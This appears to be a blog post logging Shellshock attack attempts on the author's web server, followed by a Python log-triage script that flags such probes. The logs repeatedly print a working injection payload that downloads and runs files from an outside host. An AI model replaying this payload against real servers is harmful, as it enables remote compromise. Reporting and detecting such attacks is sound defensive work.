Shellshocks

They're at it again, hammering the poor server all night trying to exploit Shellshock. And this time the IP was Spanish, registered under the domain wmega.es. I don't know whether it has been compromised … or whether it is in the business of trying to compromise others.

94.23.86.112 – – [25/Sep/2015:03:01:41 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”
94.23.86.112 – – [25/Sep/2015:03:01:41 +0200] “GET /cgi-bin/php5-cli? HTTP/1.0” 404 497 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

php5 hack

Honestly, it looks more like a compromised machine, because I have received more identical attempts from different IPs.

188.40.55.136 – – [25/Sep/2015:01:53:15 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 323 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

91.121.139.161 – – [24/Sep/2015:22:44:26 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 323 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

200.0.35.194 – – [24/Sep/2015:20:54:24 +0200] “GET /phppath/php HTTP/1.0” 404 492 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

93.189.4.131 – – [24/Sep/2015:17:45:47 +0200] “GET /cgi-bin/%2f/admin.html HTTP/1.0” 404 323 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

188.165.245.68 – – [24/Sep/2015:03:23:39 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

188.165.237.170 – – [24/Sep/2015:03:21:41 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

94.23.4.99 – – [24/Sep/2015:03:17:58 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

And so on, a whole bunch more … what a nuisance …
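To triage a log full of entries like the ones above, the following added example (not part of the original post) parses Apache combined-format lines, flags requests carrying the `() {` function-definition marker in any logged field, and groups them by source IP. It assumes raw log lines with straight quotes; the sample lines, the documentation IPs and the `CMD` stand-in are constructed.

```python
import re
from collections import defaultdict

# Apache "combined" format. Quoted fields may hold backslash-escaped quotes,
# which is how Apache logs a '"' inside a header value.
QUOTED = r'"(?P<{}>(?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] ' + QUOTED.format("request")
    + r' (?P<status>\d{3}) \S+ ' + QUOTED.format("referer")
    + " " + QUOTED.format("agent") + r'\s*$'
)
# Shellshock probes put a bash function definition into a header value.
MARKER_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (documentation IPs, CMD stands in for the payload).
SAMPLE_LOG = r'''
203.0.113.10 - - [25/Sep/2015:03:01:41 +0200] "GET /cgi-bin/php5? HTTP/1.0" 404 493 "() { :;} ;echo;CMD -r '$a = \"v\";'" "-"
203.0.113.10 - - [25/Sep/2015:03:01:41 +0200] "GET /cgi-bin/php5-cli? HTTP/1.0" 404 497 "() { :;} ;echo;CMD" "-"
198.51.100.7 - - [24/Sep/2015:20:54:24 +0200] "GET /phppath/php HTTP/1.0" 404 492 "-" "() { :;} ;echo;CMD"
198.51.100.9 - - [24/Sep/2015:20:55:00 +0200] "GET /cgi-bin/status HTTP/1.0" 200 512 "() { :;} ;echo;CMD" "-"
192.0.2.44 - - [24/Sep/2015:21:00:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''.strip().splitlines()

def find_probes(lines):
    """Return one record per request carrying the marker in any logged field."""
    probes = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        field = next((f for f in ("request", "referer", "agent")
                      if MARKER_RE.search(m[f])), None)
        if field:
            parts = m["request"].split()
            probes.append({"ip": m["ip"], "field": field, "status": int(m["status"]),
                           "path": parts[1] if len(parts) > 1 else m["request"]})
    return probes

def summarize(probes):
    """Group probes by source IP; flag any that did not end in a 404."""
    out = defaultdict(lambda: {"attempts": 0, "paths": set(), "review": False})
    for p in probes:
        entry = out[p["ip"]]
        entry["attempts"] += 1
        entry["paths"].add(p["path"])
        entry["review"] |= p["status"] != 404
    return {ip: {**e, "paths": sorted(e["paths"])} for ip, e in out.items()}

if __name__ == "__main__":
    for ip, info in summarize(find_probes(SAMPLE_LOG)).items():
        print(ip, info)
```

A `review` flag only means the probed path exists on the server; whether the CGI behind it runs through a vulnerable bash still has to be checked on the host.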
